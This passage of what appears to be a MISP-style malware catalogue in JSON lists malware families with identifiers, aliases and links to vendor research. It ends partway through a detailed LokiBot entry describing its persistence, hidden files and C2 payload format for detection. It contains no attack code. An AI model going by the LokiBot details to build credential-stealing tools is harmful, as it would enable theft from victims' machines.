"https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", - "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", - "https://isc.sans.edu/diary/23417" - ] - } - }, - { - "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", - "value": "FakeRean", - "description": "", - "meta": { - "synonyms": [ - "Braviax" - ], - "type": [], - "refs": [ - "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", - "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", - "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf" - ] - } - }, - { - "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", - "value": "Nexster Bot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/benkow_/status/789006720668405760" - ] - } - }, - { - "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", - "value": "Mosquito", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" - ] - } - }, - { - "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", - "value": "Moker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://breakingmalware.com/malware/moker-part-2-capabilities/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", - "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", - "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network" - ] - } - }, - { - "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", - "value": "Zeus MailSniffer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": 
"29f4ae5a-4ccd-451b-bd3e-d301865da034", - "value": "FantomCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" - ] - } - }, - { - "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", - "value": "GearInformer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.rekings.com/ispy-customers/", - "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" - ] - } - }, - { - "uuid": "009db412-762d-4256-8df9-eb213be01ffd", - "value": "SslMM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "1ab17959-6254-49af-af26-d34e87073e49", - "value": "FirstRansom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/815949909648150528" - ] - } - }, - { - "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", - "value": "BernhardPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" - ] - } - }, - { - "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", - "value": "iMuler", - "description": "", - "meta": { - "synonyms": [ - "Revir" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", - "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" - ] - } - }, - { - "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", - "value": "Kovter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", - "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/" - ] - } - }, - { - "uuid": "996e73e9-b093-4987-9992-f52008e55b24", - "value": "Makadocs", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", - "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" - ] - } - }, - { - "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", - "value": "Lethic", - "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.malware-traffic-analysis.net/2017/11/02/index.html", - "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", - "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", - "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" - ] - } - }, - { - "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", - "value": "WndTest", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", - "value": "Unidentified 034", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" - ] - } - }, - { - "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", - "value": "Siggen6", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", - "value": "ComradeCircle", - "description": "", - "meta": { - "synonyms": [], - 
"type": [], - "refs": [ - "https://twitter.com/struppigel/status/816926371867926528" - ] - } - }, - { - "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", - "value": "Goodor", - "description": "", - "meta": { - "synonyms": [ - "Fuerboos" - ], - "type": [], - "refs": [ - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" - ] - } - }, - { - "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", - "value": "Tofsee", - "description": "", - "meta": { - "synonyms": [ - "Gheg" - ], - "type": [], - "refs": [ - "https://www.cert.pl/en/news/single/tofsee-en/", - "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", - "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" - ] - } - }, - { - "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", - "value": "AdultSwine", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" - ] - } - }, - { - "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", - "value": "Morto", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", - "https://www.f-secure.com/weblog/archives/00002227.html", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" - ] - } - }, - { - "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", - "value": "KrBanker", - "description": "", - "meta": { - "synonyms": [ - "BlackMoon" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", - "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - 
"http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" - ] - } - }, - { - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "The iOS malware that is installed over USB by osx.wirelurker", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - } - }, - { - "uuid": "3556df83-9772-40c7-b418-dc4a67b9c54f", - "value": "Unidentified 043", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", - "value": "Szribi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", - "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", - "https://www.secureworks.com/research/srizbi" - ] - } - }, - { - "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", - "value": "CryptoLocker", - "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. 
To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.secureworks.com/research/cryptolocker-ransomware" - ] - } - }, - { - "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", - "value": "WebC2-AdSpace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", - "value": "TemptingCedar Spyware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" - ] - } - }, - { - "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", - "value": "Cloud Duke", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002822.html" - ] - } - }, - { - "uuid": "94323b32-9566-450b-8480-5f9f53b57948", - "value": "taidoor", - "description": "", - "meta": { - "synonyms": [ - "simbot" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" - ] - } - }, - { - "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", - "value": "Tsifiri", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", - "value": "CyberSplitter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", - "value": "Trump Bot", - "description": "", - 
"meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://paper.seebug.org/345/" - ] - } - }, - { - "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", - "value": "Carberp", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "f43a0e38-2394-4538-a123-4a0457096058", - "value": "Unidentified 025 (Clickfraud)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2016/05/09/index.html" - ] - } - }, - { - "uuid": "db755407-4135-414c-90e3-97f5e48c6065", - "value": "Winsloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - } - }, - { - "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", - "value": "Pteranodon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" - ] - } - }, - { - "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", - "value": "FormerFirstRAT", - "description": "", - "meta": { - "synonyms": [ - "ffrat" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" - ] - } - }, - { - "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", - "value": "Rustock", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", - "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", - "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", - "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", - 
"https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", - "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", - "https://www.secureworks.com/blog/research-21041", - "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/" - ] - } - }, - { - "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", - "value": "KINS", - "description": "", - "meta": { - "synonyms": [ - "Kasper Internet Non-Security", - "Maple" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://www.youtube.com/watch?v=C-dEOt0GzSE", - "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", - "https://github.com/nyx0/KINS" - ] - } - }, - { - "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", - "value": "Irc16", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/show/?c=5&i=10193&lng=en" - ] - } - }, - { - "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", - "value": "Shishiga", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" - ] - } - }, - { - "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", - "value": "Agent.BTZ", - "description": "", - "meta": { - "synonyms": [ - "Sun rootkit", - "ComRAT" - ], - "type": [], - "refs": [ - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", - "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", - "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - 
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", - "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" - ] - } - }, - { - "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", - "value": "Zezin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/siri_urz/status/923479126656323584", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" - ] - } - }, - { - "uuid": "272268bb-2715-476b-a121-49142581c559", - "value": "SeDll", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", - "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets" - ] - } - }, - { - "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", - "value": "MrBlack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/?i=5760&c=23&lng=en" - ] - } - }, - { - "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", - "value": "Unidentified 031", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", - "value": "ThreeByte", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - } - }, - { - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] - } - }, - { - "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", - "value": "FlokiBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", - "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", - "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", - "http://adelmas.com/blog/flokibot.php", - "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", - "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", - "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" - ] - } - }, - { - "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", - "value": "Avzhan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" - ] - } - }, - { - "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", - "value": "Kaiten", - "description": "", - "meta": { - "synonyms": [ - "STD" - ], - "type": [], - "refs": [ - "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" - ] - } - }, - { - "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", - "value": "Evrial", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" - ] - } - }, - { - "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", - "value": "Revenge RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://isc.sans.edu/diary/rss/22590", - "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/" - ] - } - }, - { - "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", - "value": "JenX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" - ] - 
} - }, - { - "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", - "value": "NewCore RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" - ] - } - }, - { - "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", - "value": "Fanny", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" - ] - } - }, - { - "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", - "value": "Shurl0ckr", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" - ] - } - }, - { - "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", - "value": "CryptoShield", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", - "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" - ] - } - }, - { - "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", - "value": "IoT Reaper", - "description": "", - "meta": { - "synonyms": [ - "Reaper", - "IoTroop" - ], - "type": [], - "refs": [ - "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", - "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", - "https://research.checkpoint.com/new-iot-botnet-storm-coming/", - "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" - ] - } - }, - { - "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", - "value": "Locky", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", - "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", - "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", - "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", - "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" - ] - } - }, - { - "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" - ] - } - }, - { - "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", - "value": "Mebromi", - "description": "", - "meta": { - "synonyms": [ - "MyBios" - ], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/bios-threat-showing-again", - "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", - "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", - "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/" - ] - } - }, - { - "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", - "value": "Maintools.js", - "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JohnLaTwC/status/915590893155098629" - ] - } - }, - { - "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", - "value": "Floxif", - "description": "", - "meta": { - "synonyms": [], - "type": 
[], - "refs": [ - "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" - ] - } - }, - { - "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", - "value": "Persirai", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" - ] - } - }, - { - "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", - "value": "WildFire", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" - ] - } - }, - { - "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", - "value": "Bozok", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" - ] - } - }, - { - "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", - "value": "Rofin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", - "value": "UDPoS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", - "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns" - ] - } - }, - { - "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", - "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - 
"http://blog.koodous.com/2017/05/bankbot-on-google-play.html" - ] - } - }, - { - "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2017/11/23/index.html" - ] - } - }, - { - "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", - "value": "Regin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] - } - }, - { - "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", - "value": "HLUX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", - "value": "WebC2-UGX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", - "value": "Confucius", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] - } - }, - { - "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", - "value": "CyberGate", - "description": "", - "meta": { - "synonyms": [ - "Rebhip" - ], - "type": [], - "refs": [ - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" - ] - } - }, - { - "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", - "value": "LokiBot", - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. 
This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
